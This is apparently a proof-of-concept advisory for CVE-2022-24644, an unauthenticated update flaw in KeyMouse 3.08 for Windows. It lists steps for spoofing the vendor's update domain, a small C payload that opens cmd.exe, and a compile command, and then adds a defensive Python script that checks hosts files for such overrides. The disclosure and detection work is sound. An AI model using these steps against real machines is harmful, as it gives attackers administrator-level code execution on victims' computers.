ZZ Inc. KeyMouse 3.08 (Windows) Unauthenticated Update Remote Code Execution Vulnerability
Usage: python3 cve-2022-24644_poc.py
Details in the report at gerr.re.
- Install KeyMouse Windows 3.08;
- Spoof `www.keymouse.com` to our attacker IP:
  - Attackers may e.g. use:
    - poorly configured routers/switches/DNS
    - DNS cache poisoning
    - ARP cache poisoning
  - For the proof-of-concept it is easiest to edit `c:\windows\system32\drivers\etc\hosts` on the target.
- Compile `proof.c` on the attacker, e.g. using `i686-w64-mingw32-gcc proof.c -o proof.exe`:

  ```c
  #include <windows.h>

  /* Proof-of-concept payload: when the spoofed update is executed it opens
   * a visible cmd.exe, which makes the code execution easy to observe. */
  int main(int argc, char const *argv[])
  {
      (void)argc;
      (void)argv;
      WinExec("cmd.exe", SW_SHOWNORMAL); /* SW_SHOWNORMAL == 1 */
      return TRUE;
  }
  ```
- Run the proof-of-concept script on the attacker;
- Start KeyMouse on the target and trigger an update:
  - Application Menu: Help -> Check For Updates
  - Task Bar: right mouse button on the task bar icon -> Check Updates (or Install Updates)
- Continue with the update.

As a result, `proof.exe` is executed in the context of the Administrator user at high integrity.
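The proof-of-concept redirects `www.keymouse.com` by editing the target's hosts file, so the simplest host-side indicator of this attack path is an active hosts entry for the vendor's update domain. The checker below is an added defensive example for this advisory, not part of the original PoC or of KeyMouse: it parses hosts-file content (comments, tabs and multiple hostnames per line included) and reports any entry that resolves a watched domain or one of its subdomains. The function names `parse_hosts`, `find_overrides` and `check_windows_hosts` are chosen here; the hosts-file path is the one quoted in the advisory; `SAMPLE_HOSTS` is constructed sample content, and the addresses in it are from documentation/private ranges.

```python
"""Hosts-file override check for a vendor's update domain.

Added defensive example for this advisory (not part of the PoC or of
KeyMouse). The PoC spoofs www.keymouse.com via the target's hosts file;
this script looks for exactly that kind of entry.
"""
import ipaddress
from dataclasses import dataclass
from typing import List, Sequence, Tuple

# Path quoted in the advisory for the hosts file on the target.
WINDOWS_HOSTS_PATH = r"c:\windows\system32\drivers\etc\hosts"


@dataclass(frozen=True)
class HostsOverride:
    line_no: int
    ip: str
    hostname: str


def parse_hosts(text: str) -> List[Tuple[int, str, List[str]]]:
    """Return (line_no, ip, [hostnames]) for every active hosts entry.

    Blank lines and '#' comments (whole-line or inline) are ignored, as are
    lines whose first field is not a valid IPv4/IPv6 address.
    """
    entries = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2:
            continue  # malformed line: address without any hostname
        try:
            ipaddress.ip_address(fields[0])
        except ValueError:
            continue
        hostnames = [h.lower().rstrip(".") for h in fields[1:]]
        entries.append((line_no, fields[0], hostnames))
    return entries


def find_overrides(text: str, watched_domains: Sequence[str]) -> List[HostsOverride]:
    """List hosts entries that resolve a watched domain or any subdomain of it."""
    watched = {d.lower().rstrip(".") for d in watched_domains}
    hits = []
    for line_no, ip, hostnames in parse_hosts(text):
        for host in hostnames:
            if any(host == d or host.endswith("." + d) for d in watched):
                hits.append(HostsOverride(line_no, ip, host))
    return hits


def check_windows_hosts(watched_domains: Sequence[str] = ("keymouse.com",)) -> List[HostsOverride]:
    """Read the live hosts file at the path named in the advisory and check it."""
    with open(WINDOWS_HOSTS_PATH, encoding="utf-8", errors="replace") as fh:
        return find_overrides(fh.read(), watched_domains)


# Constructed sample: a target's hosts file after the PoC's spoof step, with
# the usual commented-out defaults and an unrelated legitimate entry.
SAMPLE_HOSTS = """\
# hosts file (constructed sample)
# localhost name resolution is handled within DNS itself.
#\t127.0.0.1       localhost
#\t::1             localhost
192.0.2.10\twww.keymouse.com   # attacker host (RFC 5737 documentation range)
10.0.0.5  update.keymouse.com
127.0.0.1 intranet.example.test
"""

if __name__ == "__main__":
    for hit in find_overrides(SAMPLE_HOSTS, ["keymouse.com"]):
        print(f"line {hit.line_no}: {hit.hostname} -> {hit.ip}")
```

Run on a Windows host, `check_windows_hosts()` inspects the file the advisory names; the same parser works unchanged on `/etc/hosts` elsewhere. Matching on the registered domain rather than the exact `www.` name is deliberate, so a spoof of any other update-related subdomain is reported too.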